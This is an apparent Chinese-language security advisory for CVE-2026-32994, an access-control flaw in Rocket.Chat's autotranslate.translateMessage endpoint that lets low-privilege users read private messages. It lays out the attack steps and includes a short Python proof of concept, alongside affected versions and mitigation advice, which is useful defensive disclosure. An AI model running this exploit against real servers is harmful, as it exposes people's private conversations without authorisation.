IPBUF安全漏洞报告
English
CVE-2026-32994 CVSS 5.3 中危

CVE-2026-32994 敏感信息泄露漏洞

披露日期: 2026-05-19

漏洞信息

漏洞编号
CVE-2026-32994
漏洞类型
信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Rocket.Chat

相关标签

IDOR信息泄露Rocket.Chat权限绕过

漏洞概述

CVE-2026-32994是Rocket.Chat特定版本中存在的一个中危漏洞。由于`/api/v1/autotranslate.translateMessage`接口缺乏房间访问权限校验,任何经过身份验证的用户均可利用此漏洞。攻击者只需提供目标消息ID,即可绕过权限限制,读取任意私密频道、群组或私信中的完整消息内容。该漏洞导致敏感数据面临泄露风险,且利用门槛较低,仅需低权限账号即可发起攻击。

技术细节

该漏洞的根源在于服务端未能正确实施访问控制检查。具体而言,当请求到达`/api/v1/autotranslate.translateMessage`端点时,系统直接调用`Messages.findOneById(messageId)`从数据库获取消息对象,但在返回数据前完全跳过了`canAccessRoomIdAsync`等用于验证用户是否有权访问该消息所属房间的关键函数。这使得攻击者可以通过遍历或猜测消息ID,利用低权限账号的认证Token发送请求,从而获取包括消息正文、发送者详情、房间ID及时间戳在内的完整`IMessage`对象。这种缺陷属于典型的不安全的直接对象引用(IDOR)。由于CVSS评分为5.3(中危),攻击者无需与受害者交互,仅需网络访问和低权限账号即可远程利用。该漏洞严重破坏了系统的保密性原则,使得内部私密通讯完全暴露给低权限用户。

攻击链分析

STEP 1
1. 获取凭证
攻击者注册或获取一个有效的低权限用户账号,并获得API认证Token(X-Auth-Token和X-User-Id)。
STEP 2
2. 识别目标ID
攻击者通过猜测、推断或利用其他信息泄露渠道获取目标私密消息的ID。
STEP 3
3. 发起恶意请求
攻击者构造HTTP POST请求,向`/api/v1/autotranslate.translateMessage`端点发送包含目标消息ID的数据包。
STEP 4
4. 绕过权限检查
服务器端处理请求,直接通过ID查询消息,未调用房间访问权限检查函数。
STEP 5
5. 获取敏感数据
服务器返回完整的消息对象,攻击者成功读取本无权访问的私密消息内容。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "https://target-domain.com/api/v1/autotranslate.translateMessage" # Headers with authentication token (Low privilege user) headers = { "X-Auth-Token": "YOUR_LOW_PRIV_TOKEN", "X-User-Id": "YOUR_USER_ID", "Content-Type": "application/json" } # Payload containing the target message ID (e.g., from a private channel) payload = { "messageId": "TARGET_MESSAGE_ID" } # Send request response = requests.post(url, json=payload, headers=headers) # Check response if response.status_code == 200: print("Vulnerable! Leaked data:") print(response.json()) else: print(f"Request failed: {response.status_code}")

影响范围

< 8.5.0
< 8.4.2
< 8.3.4
< 8.2.4
< 8.1.5
< 8.0.6
< 7.13.8
< 7.10.12

防御指南

临时缓解措施
如果无法立即升级,建议通过防火墙或反向代理临时禁用对`/api/v1/autotranslate.translateMessage`接口的访问,直到完成补丁更新。同时,管理员应审查日志,检查是否存在针对该端点的异常访问记录。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表